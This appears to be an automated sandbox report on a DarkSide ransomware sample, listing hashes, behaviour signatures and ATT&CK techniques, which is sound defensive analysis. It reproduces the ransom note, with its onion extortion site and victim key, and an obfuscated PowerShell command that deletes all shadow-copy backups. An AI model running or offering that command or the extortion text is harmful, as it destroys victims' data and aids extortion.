Overview

overview

10

Static

static

0839aabe5f...0d.exe

windows7_x64

10

0839aabe5f...0d.exe

windows10_x64

10

Analysis

  • max time kernel
    122s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 05:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe

  • Size

    59KB

  • MD5

    885fc8fb590b899c1db7b42fe83dddc3

  • SHA1

    c104056f9a926d27a2082f0510c97b09cb0eb3e5

  • SHA256

    0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d

  • SHA512

    2b8e49ad84434dcaf98635120ac54bfa7e55bb61bf9d0e3f1f25ab81e950f638311d2121217bf5840834778d5e137551e24b89da02f12dc6be99d755c54f4c13

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.5bede5a3.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW When you open our website, put the following data in the input form: Key: 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 19 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
    "C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1404
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    3b80d40a65e03e035cf76129c11559b9

    SHA1

    6a357bbb32fc88785a60ece81252cbd1920828a1

    SHA256

    c61b7f0113737d5cb04c167555cfc664858200a6379c6a76ef7b8e17f9b10d52

    SHA512

    75669dffe481137d0ed199522a352aab20b746b7c556a6f0e92aea58cf6e012824615672a76d68a94b5f6477bbe8ea2e83868e34269c841cc695b3f20eecc26d

    Download Submit
  • memory/1404-55-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1404-58-0x0000000002482000-0x0000000002484000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1404-59-0x0000000002484000-0x0000000002487000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1404-57-0x0000000002480000-0x0000000002482000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1404-56-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1404-60-0x000000000248B000-0x00000000024AA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1580-54-0x00000000754B1000-0x00000000754B3000-memory.dmp
    Filesize

    8KB

    Download